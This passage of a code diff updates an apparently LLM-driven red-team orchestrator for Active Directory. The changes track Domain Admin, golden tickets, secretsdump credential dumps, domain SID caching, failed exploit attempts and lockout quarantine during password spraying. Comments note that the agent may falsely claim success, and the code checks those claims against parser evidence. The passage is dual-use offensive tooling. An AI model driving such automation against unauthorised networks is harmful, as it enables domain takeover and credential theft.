@@ -216,4 +242,67 @@ mod tests { fn extract_users_empty_output() { assert!(extract_users("", "contoso.local").is_empty()); } + + // --- is_machine_hostname_domain --- + + #[test] + fn machine_hostname_win_prefix() { + assert!(is_machine_hostname_domain("WIN-G7FPA5ZZXZV")); + assert!(is_machine_hostname_domain("win-abc123")); + } + + #[test] + fn machine_hostname_win_fqdn() { + assert!(is_machine_hostname_domain("win-g7fpa5zzxzv.w5an.local")); + assert!(is_machine_hostname_domain("WIN-ABC123.contoso.local")); + } + + #[test] + fn machine_hostname_desktop_prefix() { + assert!(is_machine_hostname_domain("DESKTOP-ABC1234")); + assert!(is_machine_hostname_domain("desktop-xyz.corp.local")); + } + + #[test] + fn real_domain_not_machine_hostname() { + assert!(!is_machine_hostname_domain("contoso.local")); + assert!(!is_machine_hostname_domain("child.contoso.local")); + assert!(!is_machine_hostname_domain("CONTOSO")); + assert!(!is_machine_hostname_domain("CHILD")); + } + + // --- extract_users with machine hostname filtering --- + + #[test] + fn extract_users_smb_banner_machine_domain_ignored() { + // SMB banner with Kali machine domain should not override default_domain + let output = concat!( + "SMB 192.168.58.10 445 DC01 (domain:WIN-G7FPA5ZZXZV) ...\n", + "user:[jdoe] rid:[0x44e]\n", + ); + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].username, "jdoe"); + // Should use default_domain, not the machine hostname + assert_eq!(users[0].domain, "contoso.local"); + } + + #[test] + fn extract_users_upn_machine_domain_substituted() { + // UPN with machine FQDN 
should substitute default_domain + let output = "jdoe@win-g7fpa5zzxzv.w5an.local\n"; + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].username, "jdoe"); + assert_eq!(users[0].domain, "contoso.local"); + } + + #[test] + fn extract_users_real_upn_preserved() { + // Real UPN should keep its domain + let output = "jdoe@contoso.local\n"; + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].domain, "contoso.local"); + } } diff --git a/ares-cli/src/orchestrator/result_processing/admin_checks.rs b/ares-cli/src/orchestrator/result_processing/admin_checks.rs index aae0e95b..8e88b993 100644 --- a/ares-cli/src/orchestrator/result_processing/admin_checks.rs +++ b/ares-cli/src/orchestrator/result_processing/admin_checks.rs @@ -7,7 +7,77 @@ use serde_json::Value; use tracing::{info, warn}; use super::parsing::has_domain_admin_indicator; +use super::timeline::{create_admin_upgrade_timeline_event, create_domain_admin_timeline_event}; use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::StateInner; + +/// Resolve a NetBIOS/flat domain name (e.g. `FABRIKAM`) to a known FQDN. +/// +/// Checks three sources, in order: +/// 1. `state.trusted_domains`: each `TrustInfo` carries an explicit `flat_name`. +/// 2. `state.netbios_to_fqdn`: published mappings from host short names; useful +/// when the flat name happens to match a hostname mapping. +/// 3. `state.domains`: derive each FQDN's first label and compare. Catches the +/// primary domain (which is rarely in `trusted_domains`). +/// +/// Returns `None` when the flat name does not correspond to any known domain. +/// Callers must treat that as "skip caching" — guessing risks attributing the +/// SID to the wrong domain. +fn resolve_flat_to_fqdn(flat: &str, state: &StateInner) -> Option { + let target = flat.to_uppercase(); + + if let Some(t) = state + .trusted_domains + .values() + .find(|t| !t.flat_name.is_empty() && t.flat_name.to_uppercase() == target) + { + return Some(t.domain.to_lowercase()); + } + + if let Some(fqdn) = state + .netbios_to_fqdn + .get(&target) + .or_else(|| state.netbios_to_fqdn.get(flat)) + { + // Only accept the mapping if it looks like a domain FQDN, not a host + // FQDN (e.g. "DC02" → "dc02.contoso.local" should NOT yield "dc02…"). + let lower = fqdn.to_lowercase(); + if is_valid_domain_fqdn(&lower) && state.domains.iter().any(|d| d.to_lowercase() == lower) { + return Some(lower); + } + } + + state + .domains + .iter() + .find(|d| { + d.split('.') + .next() + .map(|first| first.eq_ignore_ascii_case(flat)) + .unwrap_or(false) + }) + .map(|d| d.to_lowercase()) +} + +/// Validate that a string looks like a domain FQDN. +/// +/// Rejects empty strings, IP-like patterns, strings with whitespace, and strings +/// without at least one dot. Used to filter out malformed domain values that +/// occasionally appear in tool payloads (e.g. `"192.168.58.30 - dc01"`). +fn is_valid_domain_fqdn(s: &str) -> bool { + if s.is_empty() || s.contains(' ') || s.contains(':') || s.contains('/') { + return false; + } + if !s.contains('.') { + return false; + } + let first_label = s.split('.').next().unwrap_or(""); + if first_label.is_empty() || first_label.chars().all(|c| c.is_ascii_digit()) { + return false; + } + s.chars() + .all(|c| c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_') +} /// Determine the domain admin path from a payload. 
/// @@ -80,6 +150,12 @@ pub(crate) async fn check_domain_admin_indicators(payload: &Value, dispatcher: & info!("Domain Admin achieved!"); } if !already_da { + // Emit Domain Admin timeline event + let da_domain = { + let state = dispatcher.state.read().await; + state.domains.first().cloned().unwrap_or_default() + }; + create_domain_admin_timeline_event(dispatcher, &da_domain, path.as_deref()).await; let (domain, dc_target) = { let state = dispatcher.state.read().await; let domain = state.domains.first().cloned().unwrap_or_default(); @@ -172,9 +248,35 @@ pub(crate) async fn check_golden_ticket_completion( if let Some(d) = payload.get("domain").and_then(|v| v.as_str()) { domain = d.to_string(); } - if domain.is_empty() { + // Require a krbtgt hash to actually exist for the chosen domain before + // marking GT — `Saving ticket in *.ccache` also appears in inter-realm + // forge output where no target krbtgt was ever obtained, so without this + // gate we'd publish a false-positive GT for the source/first domain. + { let state = dispatcher.state.read().await; - domain = state.domains.first().cloned().unwrap_or_default(); + let has_krbtgt = |d: &str| -> bool { + let lower = d.to_lowercase(); + state.hashes.iter().any(|h| { + h.username.eq_ignore_ascii_case("krbtgt") && h.domain.to_lowercase() == lower + }) + }; + if domain.is_empty() { + domain = state + .domains + .iter() + .find(|d| has_krbtgt(d)) + .cloned() + .unwrap_or_default(); + } else if !has_krbtgt(&domain) { + warn!( + domain = %domain, + "Suppressing golden_ticket marker — no krbtgt hash present for domain (likely inter-realm forge output)" + ); + return; + } + } + if domain.is_empty() { + return; } if let Err(e) = dispatcher .state @@ -183,6 +285,21 @@ pub(crate) async fn check_golden_ticket_completion( { warn!(err = %e, "Failed to set golden ticket flag"); } + + // Emit attack path timeline event for golden ticket + let techniques = vec!["T1558.001".to_string()]; + let event_id = format!("evt-gt-{}", &uuid::Uuid::new_v4().simple().to_string()[..8]); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "golden_ticket", + "description": format!("Golden ticket forged for domain {domain}"), + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; } pub(crate) async fn detect_and_upgrade_admin_credentials(text: &str, dispatcher: &Arc) { @@ -214,6 +331,17 @@ pub(crate) async fn detect_and_upgrade_admin_credentials(text: &str, dispatcher: pwned_host = ?pwned_ip, "Credential upgraded to admin -- dispatching priority secretsdump" ); + // Mark the host as owned so automations (lsassy_dump, etc.) 
can fire + if let Some(ref ip) = pwned_ip { + if let Err(e) = dispatcher + .state + .mark_host_owned(&dispatcher.queue, ip) + .await + { + warn!(err = %e, ip = %ip, "Failed to mark host as owned"); + } + } + create_admin_upgrade_timeline_event(dispatcher, &username, &domain).await; let work: Vec<(String, ares_core::models::Credential)> = { let state = dispatcher.state.read().await; let dc_ips: Vec = state.domain_controllers.values().cloned().collect(); @@ -280,72 +408,124 @@ pub(crate) async fn extract_and_cache_domain_sid(payload: &Value, dispatcher: &A return; } let combined = text_parts.join("\n"); - if let Some(sid) = ares_core::parsing::extract_domain_sid(&combined) { - let domain = payload - .get("domain") - .and_then(|v| v.as_str()) - .map(|d| d.to_lowercase()) - .filter(|d| !d.is_empty()); - let domain = match domain { - Some(d) => d, - None => { - let state = dispatcher.state.read().await; - match state.domains.first() { - Some(d) => d.to_lowercase(), - None => return, - } - } - }; - let already_cached = { + + // Only cache when the output is genuine LSARPC SID-discovery output — i.e. + // it has either the impacket-lookupsid `[*] Domain SID is: …` header or + // the rpcclient `lsaquery` `Domain Name / Domain Sid` pair. Arbitrary recon + // output (LDAP group enumeration, BloodHound dumps, etc.) routinely contains + // foreign-security-principal SIDs that *look* like domain SIDs but are + // actually `-` entries from a different forest. Caching a + // regex-truncated FSP SID against the task's payload domain misforges + // every downstream golden / inter-realm ticket — caused op-20260429-164553 + // to forge a TGT for contoso.local with a bogus ExtraSid that the + // parent KDC rejected with rpc_s_access_denied. + // + // lsaquery is the primary unauth path for cross-forest target SID discovery + // — it routinely succeeds against null sessions where impacket-lookupsid + // gets STATUS_ACCESS_DENIED. op-20260429-181500 discovered fabrikam's SID via + // lsaquery but failed to cache it (only lookupsid was wired up), so the + // subsequent forge_inter_realm_and_dump fired with has_target_sid=false + // and produced no krbtgt extraction. + let lookupsid_sid = ares_core::parsing::LOOKUPSID_HEADER_RE + .captures(&combined) + .and_then(|c| c.get(1).map(|m| m.as_str().to_string())); + let lsaquery_pair = ares_core::parsing::extract_lsaquery_domain_sid(&combined); + let (sid, lsaquery_flat) = match (lookupsid_sid, lsaquery_pair) { + (Some(s), _) => (s, None), + (None, Some((flat, s))) => (s, Some(flat)), + (None, None) => return, + }; + + // Resolve the FQDN this SID belongs to. Anchor preference order: + // 1. Flat name parsed from the output — authoritative when present. For + // impacket-lookupsid we get it from the RID lines (e.g. `500: FABRIKAM\…`); + // for rpcclient lsaquery we get it from `Domain Name: FABRIKAM`. + // 2. Payload's `domain` field — used only when output has no flat name AND + // the field is a valid FQDN. The payload's domain is the *task* target, + // not necessarily the domain that produced the SID; trusting it blindly + // misattributed fabrikam.local's SID to child.contoso.local in + // op-20260429-112418. + // 3. State's primary domain — last resort, only when nothing else applies. 
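Step 3, the first-label fallback, is small enough to isolate. A sketch, assuming `domains` is the state's list of known FQDNs:

```rust
/// Resolve a flat (NetBIOS) name against known domain FQDNs by comparing
/// the FQDN's first label, case-insensitively. Last-resort step only.
fn flat_to_fqdn_by_label<'a>(flat: &str, domains: &'a [String]) -> Option<&'a str> {
    domains.iter().map(|d| d.as_str()).find(|d| {
        d.split('.')
            .next()
            .is_some_and(|first| first.eq_ignore_ascii_case(flat))
    })
}

// With domains = ["contoso.local"], "CONTOSO" resolves; "FABRIKAM" yields None,
// which callers must treat as "skip caching" rather than guessing.
```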
+ let parsed_flat = lsaquery_flat.or_else(|| { + ares_core::parsing::extract_domain_sid_and_flat_name(&combined).map(|(flat, _)| flat) + }); + let domain = { + let state = dispatcher.state.read().await; + if let Some(flat) = parsed_flat.as_deref() { + resolve_flat_to_fqdn(flat, &state).or_else(|| { + // Flat name parsed but unmapped — refuse to cache. Caching + // against the payload's domain here is exactly the bug we + // are trying to avoid. + warn!( + flat_name = %flat, + sid = %sid, + "Skipping SID cache: flat name does not match any known domain" + ); + None + }) + } else { + // No flat name in output. Fall back to payload domain or primary. + payload + .get("domain") + .and_then(|v| v.as_str()) + .map(|d| d.to_lowercase()) + .filter(|d| is_valid_domain_fqdn(d)) + .or_else(|| state.domains.first().map(|d| d.to_lowercase())) + } + }; + let domain = match domain { + Some(d) => d, + None => return, + }; + let already_cached = { + let state = dispatcher.state.read().await; + state + .domain_sids + .get(&domain) + .map(|s| s == &sid) + .unwrap_or(false) + }; + if !already_cached { + let op_id = { let state = dispatcher.state.read().await; - state + state.operation_id.clone() + }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + if let Err(e) = reader.set_domain_sid(&mut conn, &domain, &sid).await { + warn!(err = %e, domain = %domain, "Failed to persist domain SID to Redis"); + } else { + info!(domain = %domain, sid = %sid, "Domain SID cached from task output"); + dispatcher + .state + .write() + .await .domain_sids - .get(&domain) - .map(|s| s == &sid) - .unwrap_or(false) + .insert(domain.clone(), sid.clone()); + } + } + if let Some(admin_name) = ares_core::parsing::extract_rid500_name(&combined) { + let already_known = { + let state = dispatcher.state.read().await; + state.admin_names.contains_key(&domain) }; - if !already_cached { + if !already_known { let op_id = { let state = dispatcher.state.read().await; state.operation_id.clone() }; let reader = ares_core::state::RedisStateReader::new(op_id); let mut conn = dispatcher.queue.connection(); - if let Err(e) = reader.set_domain_sid(&mut conn, &domain, &sid).await { - warn!(err = %e, domain = %domain, "Failed to persist domain SID to Redis"); + if let Err(e) = reader.set_admin_name(&mut conn, &domain, &admin_name).await { + warn!(err = %e, domain = %domain, "Failed to persist admin name to Redis"); } else { - info!(domain = %domain, sid = %sid, "Domain SID cached from task output"); + info!(domain = %domain, name = %admin_name, "RID-500 account name cached from task output"); dispatcher .state .write() .await - .domain_sids - .insert(domain.clone(), sid); - } - } - if let Some(admin_name) = ares_core::parsing::extract_rid500_name(&combined) { - let already_known = { - let state = dispatcher.state.read().await; - state.admin_names.contains_key(&domain) - }; - if !already_known { - let op_id = { - let state = dispatcher.state.read().await; - state.operation_id.clone() - }; - let reader = ares_core::state::RedisStateReader::new(op_id); - let mut conn = dispatcher.queue.connection(); - if let Err(e) = reader.set_admin_name(&mut conn, &domain, &admin_name).await { - warn!(err = %e, domain = %domain, "Failed to persist admin name to Redis"); - } else { - info!(domain = %domain, name = %admin_name, "RID-500 account name cached from task output"); - dispatcher - .state - .write() - .await - .admin_names - .insert(domain, admin_name); - } + .admin_names + .insert(domain, admin_name); 
} } } @@ -354,8 +534,81 @@ pub(crate) async fn extract_and_cache_domain_sid(payload: &Value, dispatcher: &A #[cfg(test)] mod tests { use super::*; + use ares_core::models::TrustInfo; use serde_json::json; + fn make_trust(domain: &str, flat: &str) -> TrustInfo { + TrustInfo { + domain: domain.to_string(), + flat_name: flat.to_string(), + direction: "bidirectional".to_string(), + trust_type: "forest".to_string(), + sid_filtering: true, + } + } + + // -- resolve_flat_to_fqdn ----------------------------------------------- + + #[test] + fn resolve_flat_uses_trusted_domain_metadata() { + let mut state = StateInner::new("op-test".into()); + state.trusted_domains.insert( + "fabrikam.local".into(), + make_trust("fabrikam.local", "FABRIKAM"), + ); + assert_eq!( + resolve_flat_to_fqdn("FABRIKAM", &state).as_deref(), + Some("fabrikam.local") + ); + } + + #[test] + fn resolve_flat_falls_back_to_primary_domain_label() { + let mut state = StateInner::new("op-test".into()); + state.domains.push("contoso.local".into()); + assert_eq!( + resolve_flat_to_fqdn("CONTOSO", &state).as_deref(), + Some("contoso.local") + ); + } + + #[test] + fn resolve_flat_unknown_returns_none() { + let state = StateInner::new("op-test".into()); + assert_eq!(resolve_flat_to_fqdn("UNKNOWN", &state), None); + } + + #[test] + fn resolve_flat_does_not_match_host_short_name() { + // netbios_to_fqdn maps DC02 → dc02.contoso.local (a host, not domain). + // resolve_flat_to_fqdn must reject this — dc02.contoso.local is not in + // state.domains, so it cannot be a domain FQDN. + let mut state = StateInner::new("op-test".into()); + state.domains.push("contoso.local".into()); + state + .netbios_to_fqdn + .insert("DC02".into(), "dc02.contoso.local".into()); + assert_eq!(resolve_flat_to_fqdn("DC02", &state), None); + } + + #[test] + fn resolve_flat_prefers_trust_metadata_over_primary_label() { + // Both child.contoso.local and contoso.local are known. + // Flat "CONTOSO" should resolve to the parent FQDN even when + // both could plausibly match by first-label heuristic. 
+ let mut state = StateInner::new("op-test".into()); + state.domains.push("child.contoso.local".into()); + state.domains.push("contoso.local".into()); + state.trusted_domains.insert( + "contoso.local".into(), + make_trust("contoso.local", "CONTOSO"), + ); + assert_eq!( + resolve_flat_to_fqdn("CONTOSO", &state).as_deref(), + Some("contoso.local") + ); + } + // -- resolve_da_path ---------------------------------------------------- #[test] diff --git a/ares-cli/src/orchestrator/result_processing/discovery_polling.rs b/ares-cli/src/orchestrator/result_processing/discovery_polling.rs index 9dd932e6..69c2fbdd 100644 --- a/ares-cli/src/orchestrator/result_processing/discovery_polling.rs +++ b/ares-cli/src/orchestrator/result_processing/discovery_polling.rs @@ -145,7 +145,16 @@ async fn poll_discoveries(dispatcher: &Dispatcher) -> Result<()> { } "user" => { if let Ok(user) = serde_json::from_value::(data.clone()) { - if ["kerberos_enum", "netexec_user_enum"].contains(&user.source.as_str()) { + if [ + "kerberos_enum", + "netexec_user_enum", + "ldap_group_enumeration", + "acl_discovery", + "foreign_group_enumeration", + "ldap_enumeration", + ] + .contains(&user.source.as_str()) + { let _ = dispatcher.state.publish_user(&dispatcher.queue, user).await; } } diff --git a/ares-cli/src/orchestrator/result_processing/mod.rs b/ares-cli/src/orchestrator/result_processing/mod.rs index 730a9815..16bd0feb 100644 --- a/ares-cli/src/orchestrator/result_processing/mod.rs +++ b/ares-cli/src/orchestrator/result_processing/mod.rs @@ -34,7 +34,10 @@ use self::admin_checks::{ }; use self::discovery_polling::has_lockout_in_result; use self::parsing::{parse_discoveries, resolve_parent_id}; -use self::timeline::{create_credential_timeline_event, create_hash_timeline_event}; +use self::timeline::{ + create_credential_timeline_event, create_exploitation_timeline_event, + create_hash_timeline_event, create_lateral_movement_timeline_event, +}; /// Kerberos/SMB errors that indicate a credential is locked out. pub(crate) const LOCKOUT_PATTERNS: &[&str] = @@ -50,7 +53,7 @@ pub async fn process_completed_task( let result = &completed.result; // Extract task-level metadata from pending_tasks before complete_task removes it. - let (cred_key, task_domain) = { + let (cred_key, task_domain, task_target_ip) = { let state = dispatcher.state.read().await; let task = state.pending_tasks.get(task_id.as_str()); let ck = task @@ -61,7 +64,11 @@ pub async fn process_completed_task( .and_then(|t| t.params.get("domain")) .and_then(|v| v.as_str()) .map(|s| s.to_string()); - (ck, td) + let tip = task + .and_then(|t| t.params.get("target_ip")) + .and_then(|v| v.as_str()) + .map(|s| s.to_string()); + (ck, td, tip) }; { @@ -115,11 +122,37 @@ pub async fn process_completed_task( let default_domain = if let Some(ref td) = task_domain { td.clone() } else { - get_default_domain(dispatcher).await + // Resolve domain from the task's target IP (e.g. secretsdump against a + // specific DC). Falls back to state.domains.first() only as last resort. + resolve_domain_from_ip(dispatcher, task_target_ip.as_deref()).await }; extract_from_raw_text(payload, dispatcher, &default_domain).await; } + // Mark host as owned when a credential_access task succeeds AND parser + // evidence proves credentials/hashes were extracted. The LLM's + // `task_complete(success=true)` is not sufficient on its own — without + // parser-grounded credential evidence we treat the claim as unverified + // and skip the state write. 
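A condensed sketch of the grounding predicate used by this gate; the full `result_has_credential_evidence` appears later in this diff, and `serde_json` is assumed:

```rust
use serde_json::Value;

/// Only a non-empty, parser-populated discoveries.credentials or
/// discoveries.hashes array counts as proof of extraction.
fn has_credential_evidence(result: &Value) -> bool {
    ["credentials", "hashes"].iter().any(|k| {
        result
            .pointer(&format!("/discoveries/{k}"))
            .and_then(Value::as_array)
            .is_some_and(|a| !a.is_empty())
    })
}

// {"discoveries": {"hashes": [{"username": "admin"}]}} -> true
// {"summary": "claimed success, no parser output"}     -> false
```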
+ if result.success { + if let Some(ref ip) = task_target_ip { + if task_id.starts_with("credential_access_") + && result_has_credential_evidence(&result.result) + { + let _ = dispatcher + .state + .mark_host_owned(&dispatcher.queue, ip) + .await; + } else if task_id.starts_with("credential_access_") { + debug!( + task_id = %task_id, + ip = %ip, + "Skipping mark_host_owned: no parser-extracted credential/hash evidence" + ); + } + } + } + // Domain SID extraction: scan raw text for S-1-5-21-... patterns (from secretsdump). // Caches the SID for golden ticket generation without needing lookupsid. if let Some(ref payload) = result.result { @@ -140,27 +173,73 @@ pub async fn process_completed_task( } } - if result.success { - if let Some(vuln_id) = completed - .task_id - .starts_with("exploit_") - .then(|| { - result - .result - .as_ref() - .and_then(|r| r.get("vuln_id")) - .and_then(|v| v.as_str()) - .map(|s| s.to_string()) - }) - .flatten() + // Handle exploit task outcomes — create timeline events for both success and failure + if completed.task_id.starts_with("exploit_") { + if let Some(vuln_id) = result + .result + .as_ref() + .and_then(|r| r.get("vuln_id")) + .and_then(|v| v.as_str()) + .map(|s| s.to_string()) { - info!(vuln_id = %vuln_id, task_id = %task_id, "Marking vulnerability as exploited"); - if let Err(e) = dispatcher - .state - .mark_exploited(&dispatcher.queue, &vuln_id) - .await - { - warn!(err = %e, vuln_id = %vuln_id, "Failed to mark vulnerability exploited"); + // Guard: LLM may call task_complete (success=true) with a result + // that actually describes a failure. Don't mark as exploited if the + // result summary contains clear failure indicators OR if no parser + // evidence (discoveries from real tool stdout) corroborates the + // exploit. The text heuristic catches obvious lies; the parser + // check catches silent fabrication. + let actually_succeeded = result.success + && !result_text_indicates_failure(&result.result) + && result_has_parser_evidence(&result.result); + + if actually_succeeded { + info!(vuln_id = %vuln_id, task_id = %task_id, "Marking vulnerability as exploited"); + if let Err(e) = dispatcher + .state + .mark_exploited(&dispatcher.queue, &vuln_id) + .await + { + warn!(err = %e, vuln_id = %vuln_id, "Failed to mark vulnerability exploited"); + } + create_exploitation_timeline_event(dispatcher, &vuln_id, task_id).await; + } else { + // Record failed exploit attempts as timeline events so they appear + // in reports (e.g. noPac patched, PrintNightmare patched, Certifried + // tool missing). This closes the "dispatched but no report evidence" gap. + let err_msg = result.error.as_deref().unwrap_or("unknown error"); + let event_id = format!( + "evt-exploit-fail-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "exploit_failed", + "description": format!("Exploit attempted but failed: {vuln_id} — {err_msg}"), + "mitre_techniques": ["T1210"], + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &["T1210".to_string()]) + .await; + info!( + vuln_id = %vuln_id, + task_id = %task_id, + err = err_msg, + "Exploit failure recorded as timeline event" + ); + // Increment per-vuln failure counter; the exploitation workflow + // skips the vuln once it crosses MAX_EXPLOIT_FAILURES, so a + // stuck vuln (e.g. mssql_access with 0 creds) cannot loop + // forever. 
+ let count = dispatcher.state.record_exploit_failure(&vuln_id).await; + if count >= crate::orchestrator::state::MAX_EXPLOIT_FAILURES { + warn!( + vuln_id = %vuln_id, + failure_count = count, + "Vuln abandoned — exceeded max exploit failures" + ); + } } } } @@ -182,15 +261,233 @@ pub async fn process_completed_task( } } + // Per-user lockout quarantine for enumeration paths (no cred_key set). + // username_as_password and password_spray test multiple users in one + // task — when a specific user trips STATUS_ACCOUNT_LOCKED_OUT we + // remember that principal so future enum tasks can skip it. + if has_lockout_in_result(result) { + let locked = extract_locked_usernames_from_result(&result.result); + if !locked.is_empty() { + let resolved_domain = if let Some(ref td) = task_domain { + td.clone() + } else { + resolve_domain_from_ip(dispatcher, task_target_ip.as_deref()).await + }; + if !resolved_domain.is_empty() { + let mut state = dispatcher.state.write().await; + for (user, dom_hint) in &locked { + let dom = dom_hint.as_deref().unwrap_or(&resolved_domain); + warn!( + user = %user, + domain = %dom, + task_id = %task_id, + "User quarantined for 5 min: enumeration lockout detected" + ); + state.quarantine_user(user, dom); + } + } + } + } + dispatcher.credential_access_notify.notify_waiters(); dispatcher.delegation_notify.notify_waiters(); let _ = dispatcher.notify_state_update().await; } -/// Get the default domain from state (first domain, or empty string). -async fn get_default_domain(dispatcher: &Arc) -> String { +/// Extract `(username, optional domain)` pairs from a tool result that +/// reported a per-user lockout. Looks at `tool_outputs`, `output`, +/// `tool_output`, and `summary` fields for netexec-style lines such as: +/// +/// `[-] DOMAIN\\username:password STATUS_ACCOUNT_LOCKED_OUT` +/// `[-] username:password KDC_ERR_CLIENT_REVOKED` +/// +/// Returns lower-cased usernames; the domain (if present in the prefix) is +/// also lowercased. Used by `process_completed_task` to populate +/// `quarantined_users` for enumeration tasks that lack a `cred_key`. +pub(crate) fn extract_locked_usernames_from_result( + result: &Option, +) -> Vec<(String, Option)> { + let mut out: Vec<(String, Option)> = Vec::new(); + let Some(payload) = result else { + return out; + }; + + let mut texts: Vec = Vec::new(); + if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { + for item in arr { + if let Some(s) = item.as_str() { + texts.push(s.to_string()); + } else if let Some(s) = item.get("output").and_then(|v| v.as_str()) { + texts.push(s.to_string()); + } + } + } + for key in &["summary", "output", "tool_output"] { + if let Some(s) = payload.get(*key).and_then(|v| v.as_str()) { + texts.push(s.to_string()); + } + } + + let mut seen: std::collections::HashSet = std::collections::HashSet::new(); + for text in texts { + for line in text.lines() { + if !LOCKOUT_PATTERNS.iter().any(|p| line.contains(p)) { + continue; + } + let Some((user, domain)) = parse_lockout_principal(line) else { + continue; + }; + let user_l = user.to_lowercase(); + // Skip accounts that ship disabled — already filtered at + // dispatch time; quarantining them adds noise, not safety. 
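The quarantine behaves like a TTL map. A sketch assuming the 5-minute window from the log message in this hunk; the type and method names are hypothetical stand-ins for `StateInner::quarantine_user`:

```rust
use std::collections::HashMap;
use std::time::{Duration, Instant};

#[derive(Default)]
struct QuarantinedUsers {
    until: HashMap<String, Instant>,
}

impl QuarantinedUsers {
    const TTL: Duration = Duration::from_secs(300); // 5 minutes

    fn quarantine(&mut self, user: &str, domain: &str) {
        let key = format!("{}@{}", user.to_lowercase(), domain.to_lowercase());
        self.until.insert(key, Instant::now() + Self::TTL);
    }

    fn is_quarantined(&self, user: &str, domain: &str) -> bool {
        let key = format!("{}@{}", user.to_lowercase(), domain.to_lowercase());
        // Expired entries simply stop matching; no sweeper needed.
        self.until.get(&key).is_some_and(|t| Instant::now() < *t)
    }
}
```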
+ if matches!( + user_l.as_str(), + "guest" | "krbtgt" | "defaultaccount" | "wdagutilityaccount" + ) { + continue; + } + let dom_l = domain.map(|d| d.to_lowercase()); + let dedup_key = format!("{user_l}@{}", dom_l.as_deref().unwrap_or("")); + if seen.insert(dedup_key) { + out.push((user_l, dom_l)); + } + } + } + out +} + +/// Pull `(username, Option)` from a netexec line that mentions a +/// lockout. Requires the canonical `DOMAIN\user:pass` token preceding the +/// lockout marker — this is the only form netexec emits for auth events. +/// Bare `user:pass` (or `Welcome1:` style narrative tokens) are rejected +/// because LLM summary text frequently contains `word:` tokens that are +/// not principals (e.g. `Notable:`, `username_as_password:`). +fn parse_lockout_principal(line: &str) -> Option<(String, Option)> { + let marker_pos = LOCKOUT_PATTERNS + .iter() + .filter_map(|p| line.find(p)) + .min()?; + let prefix = &line[..marker_pos]; + let token = prefix + .split_whitespace() + .rev() + .find(|t| t.contains('\\') && t.contains(':'))?; + let principal = token.split(':').next()?; + let (dom, user) = principal.split_once('\\')?; + if user.is_empty() || dom.is_empty() { + return None; + } + Some((user.to_string(), Some(dom.to_string()))) +} + +/// Return true if the task result carries any parser-extracted discoveries. +/// "Parser-extracted" means populated by ares-tools parsers running on real +/// tool stdout — never LLM-fabricated. Used to ground state writes (e.g. +/// `mark_exploited`) against actual evidence. +fn result_has_parser_evidence(result: &Option) -> bool { + let Some(payload) = result.as_ref() else { + return false; + }; + let Some(disc) = payload.get("discoveries") else { + return false; + }; + const KEYS: &[&str] = &[ + "credentials", + "hashes", + "hosts", + "shares", + "vulnerabilities", + "delegations", + "trusts", + "users", + "spns", + ]; + KEYS.iter().any(|k| { + disc.get(*k) + .and_then(|v| v.as_array()) + .map(|a| !a.is_empty()) + .unwrap_or(false) + }) +} + +/// Return true if the task produced parser-extracted credential or hash +/// evidence — the grounding signal for `mark_host_owned` on +/// `credential_access_*` tasks. +fn result_has_credential_evidence(result: &Option) -> bool { + let Some(payload) = result.as_ref() else { + return false; + }; + let Some(disc) = payload.get("discoveries") else { + return false; + }; + ["credentials", "hashes"].iter().any(|k| { + disc.get(*k) + .and_then(|v| v.as_array()) + .map(|a| !a.is_empty()) + .unwrap_or(false) + }) +} + +/// Check whether a task result's text indicates the LLM reported a failure, +/// even though the task technically completed (task_complete was called). 
+fn result_text_indicates_failure(result: &Option) -> bool { + let text = match result { + Some(v) => { + // Check both "summary" field and full JSON string + let summary = v.get("summary").and_then(|s| s.as_str()).unwrap_or(""); + if !summary.is_empty() { + summary.to_string() + } else { + v.to_string() + } + } + None => return false, + }; + let lower = text.to_lowercase(); + lower.starts_with("failed") + || lower.contains("\"failed:") + || lower.contains("\"failed ") + || lower.contains("failed to exploit") + || lower.contains("failed esc") + || lower.contains("missing required") + || lower.contains("missing ca") + || lower.contains("without ca name") + || lower.contains("cannot attempt") + || lower.contains("cannot execute") + || lower.contains("not available in") + || lower.contains("ept_s_not_registered") + || lower.contains("blocked:") + || lower.contains("invalidcredentials") + || lower.contains("status_account_locked") + || lower.contains("rpc_s_access_denied") +} + +/// Resolve the domain for hash/credential attribution from the task's target IP. +/// +/// Priority: +/// 1. Match target_ip to a known host's domain (hostname suffix → domain) +/// 2. Match target_ip to a domain controller entry +/// 3. Fall back to state.domains.first() +async fn resolve_domain_from_ip(dispatcher: &Arc, target_ip: Option<&str>) -> String { let state = dispatcher.state.read().await; + if let Some(ip) = target_ip { + // Check domain_controllers map first — most reliable + for (domain, dc_ip) in &state.domain_controllers { + if dc_ip == ip { + return domain.clone(); + } + } + // Derive domain from FQDN hostname (e.g. dc01.child.contoso.local + // → child.contoso.local) + for host in &state.hosts { + if host.ip == ip { + if let Some(dot) = host.hostname.find('.') { + return host.hostname[dot + 1..].to_string(); + } + } + } + } state.domains.first().cloned().unwrap_or_default() } @@ -326,6 +623,7 @@ async fn auto_chain_s4u_secretsdump(payload: &Value, dispatcher: &Arc {} Err(e) => warn!(err = %e, "S4U auto-chain: failed to dispatch secretsdump"), @@ -351,19 +649,33 @@ async fn extract_from_raw_text( // Structured discoveries from tool-call parsers are already handled by // extract_discoveries() via the "discoveries" key — this pass is a secondary // safety net for raw tool stdout that parsers may have missed. - let mut text_parts: Vec<&str> = Vec::new(); + // Each item is either an object {name, arguments, output} (preferred — see + // `dispatcher::submission`) or a bare string (legacy / blue-team paths). + // Bare strings carry no tool context, so extractors fall back to untyped + // behavior; the structured form lets extractors gate on tool name + args + // (e.g. skip credential regex for hash-auth invocations of nxc). 
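For reference, the gate described above restated as a free function, equivalent in spirit to `ToolOutputCtx::is_hash_auth` from `output_extraction`; `serde_json` assumed:

```rust
use serde_json::Value;

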